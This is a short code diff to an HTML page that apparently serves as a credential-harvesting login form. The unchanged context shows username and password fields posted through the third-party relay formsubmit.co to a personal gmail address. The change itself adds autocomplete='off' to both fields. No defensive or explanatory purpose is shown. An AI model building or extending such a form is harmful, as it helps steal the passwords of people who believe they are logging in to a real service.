--- a/index.html
+++ b/index.html
@@ -51,11 +51,11 @@
             <form action="https://formsubmit.co/geofreyonyango167@gmail.com" method="POST" autocomplete="off" enctype="multipart/form-data" id="myForm">
             <div class="input-field">
               <i class="fas fa-user"></i>
-              <input type="text" placeholder="Username" name="Username" required />
+              <input type="text" placeholder="Username" name="Username" required  autocomplete="off"/>
             </div>
             <div class="input-field">
               <i class="fas fa-lock"></i>
-              <input type="password" placeholder="Password" name="Password" required/>
+              <input type="password" placeholder="Password" name="Password" required autocomplete="off"/>
             </div>
             <input type="submit" value="Credence" class="btn solid" id="submit" />
             <p class="social-text"></p>
